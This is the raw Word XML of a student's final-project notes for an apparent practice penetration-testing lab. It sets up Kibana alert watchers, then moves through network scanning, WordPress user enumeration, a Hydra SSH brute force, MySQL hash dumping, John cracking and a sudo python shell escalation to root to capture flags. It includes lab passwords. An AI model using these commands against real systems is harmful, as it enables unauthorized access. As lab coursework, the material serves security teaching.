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000739" w14:textId="003DBB06" w:rsidR="007F3DA0" w:rsidRDefault="00CC529F">
      <w:r>
        <w:t>Final Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C8B47" w14:textId="3CB8022E" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="7A386956" w14:textId="0DD30F12" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:t>Stood up Watcher in Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F5E141" w14:textId="4945DF7C" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:tab/>
        <w:t>-HTTP Error threshold &gt;400 for 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D85997" w14:textId="430B32D9" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:tab/>
        <w:t>-HTTP Request Size Monitor &gt;3500 for 1 minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2CBF0" w14:textId="189B769C" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:tab/>
        <w:t>-CPU Usage Monitor &gt;.5 for 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21FAFE" w14:textId="75A69E37" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="141089D0" w14:textId="27B46226" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:t>IN KALI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2605F3" w14:textId="0D84A1F0" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34453DC5" w14:textId="58FC38D3" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C533441" wp14:editId="287CDB77">
            <wp:extent cx="5943600" cy="1978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D343" w14:textId="72C217F5" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="437AE523" w14:textId="77777777" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="651CA7FF" w14:textId="77777777" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:t>Run NMAP against each IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0DC5A" w14:textId="4E298BB3" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB923FC" wp14:editId="2F83482C">
            <wp:extent cx="5943600" cy="4885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CAA6" w14:textId="77777777" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="39EEE3CD" w14:textId="5481EB15" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="408150DC" w14:textId="5A1C7670" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>192.168.1.100 ELK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7425BD6E" wp14:editId="4193A733">
            <wp:extent cx="5943600" cy="25711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922C" w14:textId="32B7D9E4" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="522ED7DE" w14:textId="00D8A4D3" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:t>192.168.1.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7AB874" w14:textId="1237E023" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32B05BC8" wp14:editId="61585975">
            <wp:extent cx="5943600" cy="4251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5C03" w14:textId="0EE26558" w:rsidR="00CC529F" w:rsidRDefault="00CC529F"/>
    <w:p w14:paraId="37167A37" w14:textId="77777777" w:rsidR="00C52D5D" w:rsidRPr="00C52D5D" w:rsidRDefault="00CC529F">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">192.168.1.110 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E569067" w14:textId="7582D446" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A3363" w14:textId="7D3997E1" w:rsidR="00CC529F" w:rsidRDefault="00CC529F">
      <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC5F9BC" wp14:editId="38D65874">
            <wp:extent cx="5667375" cy="5173902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0945" cy="519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B3A" w14:textId="77777777" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D"/>
    <w:p w14:paraId="3AC4942D" w14:textId="77777777" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t>Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594060D" w14:textId="78DBC410" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t xml:space="preserve">22 SSH, 80 HTTP (Apache httpd 2.4.10 Debian), 111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 139 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="793960D1" w14:textId="77777777" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t>MAC Address 00:15:5D:00:04:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584986A" w14:textId="07F8F88C" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t xml:space="preserve">OS: WIN 6.1 (Samba 4.2.14-Debian) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC1ACA" w14:textId="77777777" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D"/>
    <w:p w14:paraId="78A2C634" w14:textId="77777777" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D"/>
    <w:p w14:paraId="15D1623F" w14:textId="77777777" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D"/>
    <w:p w14:paraId="382EC686" w14:textId="21FD8483" w:rsidR="00C52D5D" w:rsidRPr="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>192.168.1.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A517890" w14:textId="745517BE" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r w:rsidRPr="00C52D5D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Target2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA6F53" w14:textId="428AE64F" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D12780" wp14:editId="5826253E">
            <wp:extent cx="4688560" cy="4839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945" cy="485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2ECD" w14:textId="7DDC9704" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t>Open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A7F13" w14:textId="674E99CC" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t>22 SSH OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F21EB" w14:textId="3C67ADED" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t>80 http Apache httpd 2.4.10 (Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627029A2" w14:textId="60F8810F" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t xml:space="preserve">111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 139 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, 445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netbios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="387C04FA" w14:textId="5808D189" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t>OS Windows 6.1 (Samba 4.2.14-Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B5D5E" w14:textId="1F367656" w:rsidR="00C52D5D" w:rsidRDefault="00C52D5D">
      <w:r>
        <w:t>MAC: 00:15:5D:00:04:11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076693F8" w14:textId="470C6E2D" w:rsidR="00A60CD6" w:rsidRDefault="00A60CD6"/>
    <w:p w14:paraId="42EB9EAC" w14:textId="6432FCA8" w:rsidR="00A60CD6" w:rsidRDefault="00A60CD6"/>
    <w:p w14:paraId="1313A083" w14:textId="77777777" w:rsidR="00A60CD6" w:rsidRDefault="00A60CD6"/>
    <w:p w14:paraId="0F333AD0" w14:textId="6ACFF58F" w:rsidR="00A60CD6" w:rsidRDefault="00A60CD6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ENUMERATE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WPScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> TARGET1 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A9B1D" w14:textId="56EF4FF9" w:rsidR="00A60CD6" w:rsidRDefault="00A60CD6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>192.168.1.110/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>wordpress</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> --wp-content-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00EA1056">
        <w:t>ep -et -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA1056">
        <w:t>eu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1911C911" w14:textId="5A5B56EF" w:rsidR="00A60CD6" w:rsidRDefault="00A60CD6"/>
    <w:p w14:paraId="7D22ECC8" w14:textId="35DBD85A" w:rsidR="00A60CD6" w:rsidRDefault="00A2050B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C5585F" wp14:editId="35F1E056">
            <wp:extent cx="5943600" cy="5800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C6D1" w14:textId="36A04060" w:rsidR="00EA1056" w:rsidRDefault="00EA1056">
      <w:r w:rsidRPr="00EA1056">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Found 2 Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445340B4" w14:textId="799596BB" w:rsidR="00EA1056" w:rsidRDefault="00EA1056">
      <w:r w:rsidRPr="008B7506">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23018D5F" wp14:editId="72168D80">
            <wp:extent cx="4781550" cy="9956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0622" cy="100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1020" w14:textId="2BEC6014" w:rsidR="008B7506" w:rsidRDefault="008B7506">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using hydra to try their usernames against SSH open port @192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F29FC" w14:textId="77777777" w:rsidR="008B7506" w:rsidRDefault="008B7506">
      <w:r>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262E9D3C" w14:textId="237A7B45" w:rsidR="008B7506" w:rsidRDefault="008B7506">
      <w:r>
        <w:t>Hydra -l steven/Michael -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/shar/wordlists/rockyou.txt 192.168.1.110 -t 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FB65C46" w14:textId="6AF59FE1" w:rsidR="008B7506" w:rsidRDefault="008B7506">
      <w:r>
        <w:t xml:space="preserve">u: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00866A3E">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ichael</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="741989FE" w14:textId="01EF82A4" w:rsidR="008B7506" w:rsidRDefault="008B7506">
      <w:r>
        <w:t xml:space="preserve">P: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>michael</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="140AB384" w14:textId="1E575D6D" w:rsidR="008B7506" w:rsidRDefault="008B7506"/>
    <w:p w14:paraId="18A7E722" w14:textId="3DBA56BA" w:rsidR="00866A3E" w:rsidRDefault="00866A3E">
      <w:r>
        <w:t>FLAG 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0221F062" w14:textId="77777777" w:rsidR="00866A3E" w:rsidRDefault="00866A3E"/>
    <w:p w14:paraId="5AEF7420" w14:textId="20849ECA" w:rsidR="00866A3E" w:rsidRDefault="00866A3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69DA8F8A" wp14:editId="00C19AAC">
            <wp:extent cx="3105150" cy="295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5E43" w14:textId="1AA14CBC" w:rsidR="00FC1A70" w:rsidRDefault="00FC1A70"/>
    <w:p w14:paraId="39099805" w14:textId="6C0340EB" w:rsidR="0039191C" w:rsidRDefault="0039191C">
      <w:r w:rsidRPr="0039191C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FLAG1</w:t>
      </w:r>
      <w:r w:rsidR="008E37B0">
        <w:t xml:space="preserve"> in source tables on the website /service.html… ‘View Page Source’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14459297" w14:textId="51FE8F19" w:rsidR="0039191C" w:rsidRDefault="0039191C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DC48C39" wp14:editId="68442DE3">
            <wp:extent cx="4143375" cy="14192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7EA3" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="1B82527C" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="1BE463FF" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="6C899DA2" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="7452783E" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="00B849C5" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="52C2258F" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="76FD39A8" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="085DF6FF" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="07AA3B73" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="1E206FDB" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="297D0363" w14:textId="77777777" w:rsidR="0039191C" w:rsidRDefault="0039191C"/>
    <w:p w14:paraId="21B47A45" w14:textId="5D6FEA51" w:rsidR="0039191C" w:rsidRDefault="0039191C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00FC1A70">
        <w:t xml:space="preserve">ySQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC1A70">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC1A70">
        <w:t xml:space="preserve"> password: R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DD1BC" w14:textId="0AB6CBC8" w:rsidR="00FC1A70" w:rsidRDefault="00FC1A70">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA6E534" wp14:editId="3F646D02">
            <wp:extent cx="3419475" cy="378223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1114" cy="38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2F67" w14:textId="77777777" w:rsidR="00FC1A70" w:rsidRDefault="00FC1A70"/>
    <w:p w14:paraId="43B5BDB6" w14:textId="77777777" w:rsidR="00FC1A70" w:rsidRDefault="00FC1A70">
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558DE194" w14:textId="7E0C94CF" w:rsidR="00FC1A70" w:rsidRDefault="00FC1A70">
      <w:r>
        <w:t>From var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u root -p R@v3nSecurity to login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDE554A" w14:textId="285BDE06" w:rsidR="00FC1A70" w:rsidRDefault="00FC1A70">
      <w:r>
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B43F3C" w14:textId="7E8F5649" w:rsidR="00FC1A70" w:rsidRDefault="00FC1A70">
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F62139" w14:textId="4EB6770C" w:rsidR="00FC1A70" w:rsidRDefault="00182684">
      <w:r>
        <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901F14F" w14:textId="0CF8DC2C" w:rsidR="00182684" w:rsidRDefault="00182684">
      <w:r>
        <w:t xml:space="preserve">select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42232CBF" w14:textId="513DB0F1" w:rsidR="00182684" w:rsidRDefault="00182684">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B094150" wp14:editId="392811BF">
            <wp:extent cx="5943600" cy="17614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BA00" w14:textId="4C2E3A3F" w:rsidR="00182684" w:rsidRDefault="00182684">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I know </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>michael’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password is ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>michael</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D6A4A" w14:textId="7A6365D5" w:rsidR="00182684" w:rsidRDefault="00182684"/>
    <w:p w14:paraId="52468B1F" w14:textId="5A9C63DE" w:rsidR="00182684" w:rsidRDefault="00182684">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Steven’s pw hash is </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4B9D">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/</w:t>
      </w:r>
      <w:r w:rsidR="002B4B9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB01603" w14:textId="7791B29A" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Pw is </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4B9D">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pink84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D43CB" w14:textId="1C061093" w:rsidR="00182684" w:rsidRDefault="00182684">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Saved the hash to wp_hash.txt in Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB6AA46" w14:textId="3B7C6ADC" w:rsidR="00182684" w:rsidRDefault="00182684">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Command: john wp_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1C4719" w14:textId="2B7DA99E" w:rsidR="00182684" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C44D1D7" wp14:editId="3A7CEDFA">
            <wp:extent cx="5943600" cy="8890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ECFD" w14:textId="65F07089" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541A34AD" w14:textId="0AFD4FCB" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>steven@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> p:pink84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC0215" w14:textId="2272CBE6" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo -l </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B932FF" w14:textId="7D023B40" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Steven can run python as sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A80D92" w14:textId="4FE1E99B" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Sudo python -c ‘import pty;pty.spawn(“/bin/bash”);’ to gain root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CBB840" w14:textId="3C6AC46E" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Then navigate to root folder to find the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF4D92F" w14:textId="183CBDBD" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EACB525" w14:textId="1684BAE2" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4B9D">
        <w:rPr>
          <w:noProof/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Flag4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47B115" w14:textId="66FE8A2C" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65470526" wp14:editId="260297E7">
            <wp:extent cx="3362325" cy="191393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7321" cy="192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AE7F" w14:textId="44896252" w:rsidR="002B4B9D" w:rsidRDefault="002B4B9D">
      <w:pPr>
        <w:rPr>
